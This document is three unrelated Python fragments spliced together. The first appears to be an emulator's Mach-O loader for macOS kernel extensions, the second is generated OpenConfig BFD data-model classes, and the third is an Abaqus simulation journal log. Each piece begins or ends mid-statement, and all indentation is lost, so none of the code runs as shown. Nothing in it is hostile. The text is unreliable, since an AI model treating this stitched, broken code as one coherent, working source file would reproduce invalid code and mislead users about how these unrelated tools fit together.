self.using_dyld = False
self.vm_end_addr = 0x0
self.ql.mem.map(self.stack_address, self.stack_size, info="[stack]")
if self.is_driver:
self.loadDriver(self.stack_address)
self.ql.hook_code(hook_kernel_api)
else:
self.loadMacho()
self.stack_address = (int(self.stack_sp))
self.ql.reg.arch_sp = self.stack_address # self.stack_sp
self.init_sp = self.ql.reg.arch_sp
self.ql.os.macho_task.min_offset = page_align_end(self.vm_end_addr, PAGE_SIZE)
def loadDriver(self, stack_addr, loadbase = -1, argv = [], env = {}):
self.import_symbols = {}
PAGE_SIZE = 0x1000
if loadbase < 0:
loadbase = 0xffffff7000000000
self.slide = loadbase
self.load_address = loadbase
cmds = self.macho_file.commands
for cmd in cmds:
if cmd.cmd_id == LC_SEGMENT_64:
self.loadSegment64(cmd, False)
self.kext_size = self.vm_end_addr - loadbase
kernel_path = os.path.join(self.ql.rootfs, "System/Library/Kernels/kernel.development")
self.ql.log.info("Parsing kernel:")
self.kernel = MachoParser(self.ql, kernel_path)
# Create memory for external static symbol jmp code
self.static_addr = self.vm_end_addr
self.static_size = PAGE_SIZE
self.ql.mem.map(self.static_addr, self.static_size, info="[STATIC]")
self.vm_end_addr += PAGE_SIZE
self.ql.log.info("Memory for external static symbol is created at 0x%x with size 0x%x" % (self.static_addr, self.static_size))
self.static_symbols = {}
# Load kernel
self.slide = 0
self.loading_file = self.kernel
kern_cmds = self.kernel.commands
self.kernel_base = None
for cmd in kern_cmds:
if cmd.cmd_id == LC_SEGMENT_64:
if self.kernel_base is None:
self.kernel_base = cmd.vm_address
self.loadSegment64(cmd, False)
self.ql.log.info("Kernel loaded at 0x%x" % self.kernel_base)
# Resolve local relocation
for relocation in self.macho_file.dysymbol_table.locreloc:
seg = None
for segment in self.macho_file.segments:
if relocation.symbolnum in segment.sections_index:
seg = segment
break
current_value, = struct.unpack("<Q", self.ql.mem.read(loadbase + relocation.address, 8))
self.ql.log.debug("Patching relocation (0x%x): from 0x%x, update to segment %s at 0x%x" % (loadbase + relocation.address, current_value, seg.name, loadbase + seg.vm_address))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", current_value + loadbase ))
# Resolve dynamic symbols
kernel_local_symbols_index = self.kernel.dysymbol_table.locsymbol_index
kernel_local_symbols_num = self.kernel.dysymbol_table.locsymbol_num
self.kernel_local_symbols_detail = self.kernel.symbol_table.details(kernel_local_symbols_index, kernel_local_symbols_num, self.kernel.string_table)
for key in self.kernel_local_symbols_detail:
value = self.kernel_local_symbols_detail[key]
self.import_symbols[value["n_value"]] = key.decode('ascii')
kernel_extrn_symbols_index = self.kernel.dysymbol_table.defext_index
kernel_extrn_symbols_num = self.kernel.dysymbol_table.defext_num
self.kernel_extrn_symbols_detail = self.kernel.symbol_table.details(kernel_extrn_symbols_index, kernel_extrn_symbols_num, self.kernel.string_table)
for key in self.kernel_extrn_symbols_detail:
value = self.kernel_extrn_symbols_detail[key]
self.import_symbols[value["n_value"]] = key.decode('ascii')
offset = 0
"""
0: 48 83 ec 08 sub rsp,0x8
4: c7 04 24 af be ad de mov DWORD PTR [rsp],0xdeadbeaf
b: c7 44 24 04 be ba fe mov DWORD PTR [rsp+0x4],0xcafebabe
12: ca
13: c3 ret
"""
for relocation in self.macho_file.dysymbol_table.extreloc:
symbol = self.macho_file.symbol_table.symbols[relocation.symbolnum]
symname = self.macho_file.string_table[symbol.n_strx]
if relocation.length == 2 and relocation.rtype == 2:
if symname not in self.static_symbols:
if symname in self.kernel_local_symbols_detail:
real_addr = self.kernel_local_symbols_detail[symname]["n_value"]
elif b"_" + symname in self.kernel_extrn_symbols_detail:
# ___MALLOC ftw???
real_addr = self.kernel_extrn_symbols_detail[b"_" + symname]["n_value"]
elif symname in self.kernel_extrn_symbols_detail:
real_addr = self.kernel_extrn_symbols_detail[symname]["n_value"]
else:
self.ql.log.info("Static symbol %s not found" % symname)
continue
self.import_symbols[real_addr] = symname.decode('ascii')
lo_addr = real_addr & 0xffffffff
hi_addr = (real_addr & 0xffffffff00000000) // 0x100000000
jmpcode = b"\x48\x83\xec\x08\xc7\x04\x24" + struct.pack("<I", lo_addr) + b"\xc7\x44\x24\x04" + struct.pack("<I", hi_addr) + b"\xc3"
self.ql.mem.write(self.static_addr + offset, jmpcode)
self.ql.mem.write(loadbase + relocation.address, struct.pack("<I", self.static_addr + offset - (loadbase + relocation.address + 4)))
self.static_symbols[symname] = self.static_addr + offset
offset += len(jmpcode)
else:
self.ql.mem.write(loadbase + relocation.address, struct.pack("<I", self.static_symbols[symname] - (loadbase + relocation.address + 4)))
# ql.log.info("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.static_symbols[symname]))
continue
if relocation.extern == 0 or relocation.length != 3:
continue
if symname in self.kernel_local_symbols_detail:
# ql.log.debug("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.kernel_local_symbols_detail[symname]["n_value"]))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", self.kernel_local_symbols_detail[symname]["n_value"]))
elif symname in self.kernel_extrn_symbols_detail:
# ql.log.debug("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.kernel_extrn_symbols_detail[symname]["n_value"]))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", self.kernel_extrn_symbols_detail[symname]["n_value"]))
else:
self.ql.log.info("Symbol %s not found!" % symname)
# Update resolved symbols in table
self.loadbase = loadbase
index = self.macho_file.dysymbol_table.locsymbol_index
num = self.macho_file.dysymbol_table.locsymbol_num
self.kext_local_symbols = self.macho_file.symbol_table.details(index, num, self.macho_file.string_table)
index = self.macho_file.dysymbol_table.defext_index
num = self.macho_file.dysymbol_table.defext_num
self.kext_extern_symbols = self.macho_file.symbol_table.details(index, num, self.macho_file.string_table)
if self.IOKit is True:
# Get exported vtables
self.vtables = {}
for symbol in self.macho_file.symbol_table.symbols:
if symbol.n_type == 0xf and "__const".ljust(16, "\x00") == self.macho_file.sections[symbol.n_sect].name:
symname = self.macho_file.string_table[symbol.n_strx]
self.ql.log.info("Found vtable of %s at 0x%x" % (symname, loadbase + symbol.n_value))
self.vtables[symname] = loadbase + symbol.n_value
kext = self.plist["IOKitPersonalities"][self.kext_name]["IOClass"]
user = self.plist["IOKitPersonalities"][self.kext_name]["IOUserClientClass"]
self.kext_alloc = None
self.kext_init = None
self.kext_attach = None
self.kext_probe = None
self.kext_detach = None
self.kext_start = None
# No need to detach since we will emulate kext and user together
self.user_alloc = None
self.user_initWithTask = None
self.user_attach = None
self.user_start = None
for relocation in self.macho_file.dysymbol_table.extreloc:
symbol = self.macho_file.symbol_table.symbols[relocation.symbolnum]
symname = self.macho_file.string_table[symbol.n_strx]
if b"externalMethod" in symname:
current_value, = struct.unpack("<Q", self.ql.mem.read(loadbase + relocation.address, 8))
print(symname, hex(relocation.address), hex(current_value))
for symname in self.vtables:
# TODO: Use IDA Pro to dump offset of methods of IOService and IOUserClient objects
if symname.decode().endswith(str(len(kext)) + kext + "9MetaClassE"):
self.kext_alloc, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x98, 8))
elif symname.decode().endswith(str(len(kext)) + kext):
self.kext_init, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x258, 8))
self.kext_attach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x680, 8))
self.kext_probe, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5c8, 8))
self.kext_detach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x688, 8))
self.kext_start, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5d0, 8))
elif symname.decode().endswith(str(len(user)) + user + "9MetaClassE"):
self.user_alloc, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x98, 8))
elif symname.decode().endswith(str(len(user)) + user):
self.user_initWithTask, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x8f0, 8))
self.user_attach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x680, 8))
self.user_start, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5d0, 8))
self.user_externalMethod, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x860, 8))
else:
# from pprint import pprint
# pprint(kext_local_symbols)
if b"__realmain" in self.kext_local_symbols:
realmain = loadbase + self.kext_local_symbols[b"__realmain"]["n_value"]
current_value, = struct.unpack("<Q", self.ql.mem.read(realmain, 8))
self.ql.log.info("Found entry point: 0x%x" % (current_value))
self.kext_start = current_value
else:
self.ql.log.info("Entry point not found")
self.kext_start = None
if b"__antimain" in self.kext_local_symbols:
antimain = loadbase + | |
"""
Operational state parameters for BFD on the specified
interface.
.. attribute:: id
A unique identifier for the interface
**type**\: str
**config**\: False
.. attribute:: enabled
When this leaf is set to true then the BFD session is enabled on the specified interface \- if it is set to false, it is administratively disabled
**type**\: bool
**config**\: False
.. attribute:: local_address
The source IP address to be used for BFD sessions over this interface
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
**config**\: False
.. attribute:: desired_minimum_tx_interval
The minimum interval between transmission of BFD control packets that the operator desires. This value is advertised to the peer, however the actual interval used is specified by taking the maximum of desired\-minimum\-tx\-interval and the value of the remote required\-minimum\-receive interval value. This value is specified as an integer number of microseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: microseconds
.. attribute:: required_minimum_receive
The minimum interval between received BFD control packets that this system should support. This value is advertised to the remote peer to indicate the maximum frequency (i.e., minimum inter\-packet interval) between BFD control packets that is acceptable to the local system
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: microseconds
.. attribute:: detection_multiplier
The number of packets that must be missed to declare this session as down. The detection interval for the BFD session is calculated by multiplying the value of the negotiated transmission interval by this value
**type**\: int
**range:** 1..65535
**config**\: False
.. attribute:: enable_per_member_link
When this leaf is set to true \- BFD will be enabled on each member interface of the aggregated Ethernet bundle
**type**\: bool
**config**\: False
**default value**\: false
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('id', (YLeaf(YType.str, 'id'), ['str'])),
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('local_address', (YLeaf(YType.str, 'local-address'), ['str','str'])),
('desired_minimum_tx_interval', (YLeaf(YType.uint32, 'desired-minimum-tx-interval'), ['int'])),
('required_minimum_receive', (YLeaf(YType.uint32, 'required-minimum-receive'), ['int'])),
('detection_multiplier', (YLeaf(YType.uint16, 'detection-multiplier'), ['int'])),
('enable_per_member_link', (YLeaf(YType.boolean, 'enable-per-member-link'), ['bool'])),
])
self.id = None
self.enabled = None
self.local_address = None
self.desired_minimum_tx_interval = None
self.required_minimum_receive = None
self.detection_multiplier = None
self.enable_per_member_link = None
self._segment_path = lambda: "state"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.State, ['id', 'enabled', 'local_address', 'desired_minimum_tx_interval', 'required_minimum_receive', 'detection_multiplier', 'enable_per_member_link'], name, value)
class InterfaceRef(_Entity_):
"""
Reference to an interface or subinterface
.. attribute:: config
Configured reference to interface / subinterface
**type**\: :py:class:`Config <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.InterfaceRef.Config>`
.. attribute:: state
Operational state for interface\-ref
**type**\: :py:class:`State <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.InterfaceRef.State>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef, self).__init__()
self.yang_name = "interface-ref"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("config", ("config", Bfd.Interfaces.Interface.InterfaceRef.Config)), ("state", ("state", Bfd.Interfaces.Interface.InterfaceRef.State))])
self._leafs = OrderedDict()
self.config = Bfd.Interfaces.Interface.InterfaceRef.Config()
self.config.parent = self
self._children_name_map["config"] = "config"
self.state = Bfd.Interfaces.Interface.InterfaceRef.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._segment_path = lambda: "interface-ref"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef, [], name, value)
class Config(_Entity_):
"""
Configured reference to interface / subinterface
.. attribute:: interface
Reference to a base interface. If a reference to a subinterface is required, this leaf must be specified to indicate the base interface
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface>`
.. attribute:: subinterface
Reference to a subinterface \-\- this requires the base interface to be specified using the interface leaf in this container. If only a reference to a base interface is requuired, this leaf should not be set
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`index <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Subinterfaces.Subinterface>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef.Config, self).__init__()
self.yang_name = "config"
self.yang_parent_name = "interface-ref"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('subinterface', (YLeaf(YType.str, 'subinterface'), ['int'])),
])
self.interface = None
self.subinterface = None
self._segment_path = lambda: "config"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef.Config, ['interface', 'subinterface'], name, value)
class State(_Entity_):
"""
Operational state for interface\-ref
.. attribute:: interface
Reference to a base interface. If a reference to a subinterface is required, this leaf must be specified to indicate the base interface
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface>`
**config**\: False
.. attribute:: subinterface
Reference to a subinterface \-\- this requires the base interface to be specified using the interface leaf in this container. If only a reference to a base interface is requuired, this leaf should not be set
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`index <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Subinterfaces.Subinterface>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "interface-ref"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('subinterface', (YLeaf(YType.str, 'subinterface'), ['int'])),
])
self.interface = None
self.subinterface = None
self._segment_path = lambda: "state"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef.State, ['interface', 'subinterface'], name, value)
class MicroBfdSessions(_Entity_):
"""
Parameters relating to micro\-BFD sessions associated
with the interface.
.. attribute:: micro_bfd_session
This list contains configuration and state parameters relating to micro\-BFD session
**type**\: list of :py:class:`MicroBfdSession <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions, self).__init__()
self.yang_name = "micro-bfd-sessions"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("micro-bfd-session", ("micro_bfd_session", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession))])
self._leafs = OrderedDict()
self.micro_bfd_session = YList(self)
self._segment_path = lambda: "micro-bfd-sessions"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.MicroBfdSessions, [], name, value)
class MicroBfdSession(_Entity_):
"""
This list contains configuration and state parameters
relating to micro\-BFD session.
.. attribute:: member_interface (key)
A reference to the member interface of the link aggregate
**type**\: str
**refers to**\: :py:class:`member_interface <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config>`
.. attribute:: config
Configuration parameters for the micro\-BFD session
**type**\: :py:class:`Config <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config>`
.. attribute:: state
Operational state parameters for the micro\-BFD session
**type**\: :py:class:`State <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession, self).__init__()
self.yang_name = "micro-bfd-session"
self.yang_parent_name = "micro-bfd-sessions"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['member_interface']
self._child_classes = OrderedDict([("config", ("config", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config)), ("state", ("state", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State))])
self._leafs = OrderedDict([
('member_interface', (YLeaf(YType.str, 'member-interface'), ['str'])),
])
self.member_interface = None
self.config = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config()
self.config.parent = self
self._children_name_map["config"] = "config"
self.state = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._segment_path = lambda: "micro-bfd-session" + "[member-interface='" + str(self.member_interface) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession, ['member_interface'], name, value)
class Config(_Entity_):
"""
Configuration parameters for the micro\-BFD session.
.. attribute:: local_address
The local IP address used by the system for the micro\-BFD session specified
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
.. attribute:: remote_address
The remote IP destination that should be used by the system for the micro\-BFD session specified
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
.. attribute:: member_interface
Reference to a member link of the aggregate interface being described
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Config>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config, self).__init__()
self.yang_name = "config"
self.yang_parent_name = "micro-bfd-session"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('local_address', (YLeaf(YType.str, 'local-address'), ['str','str'])),
| |
0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 347.897059440613})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_COMPLETED, {
'time': 'Wed Oct 19 10:33:42 2011', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1.0, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 422.442700386047})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 1.0, 'attempts': 1,
'timeIncrement': 1.0, 'increment': 1, 'stepTime': 1.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 2,
'phase': STANDARD_PHASE, 'equilibrium': 2})
mdb.jobs['OneTaper3D']._Message(END_STEP, {'phase': STANDARD_PHASE,
'stepId': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_COMPLETED, {
'time': 'Wed Oct 19 10:34:32 2011', 'jobName': 'OneTaper3D'})
mdb.models['Model-1'].steps['Step-1'].setValues(adaptiveDampingRatio=0.05,
continueDampingFactors=False, initialInc=1e-06, maxInc=0.01, maxNumInc=1000
, minInc=1e-07, nlgeom=ON, stabilizationMagnitude=0.0002,
stabilizationMethod=DISSIPATED_ENERGY_FRACTION)
mdb.models['Model-1'].boundaryConditions['BC-2'].setValues(u2=-0.02)
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1e-06, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 423.494834899902})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 1U',
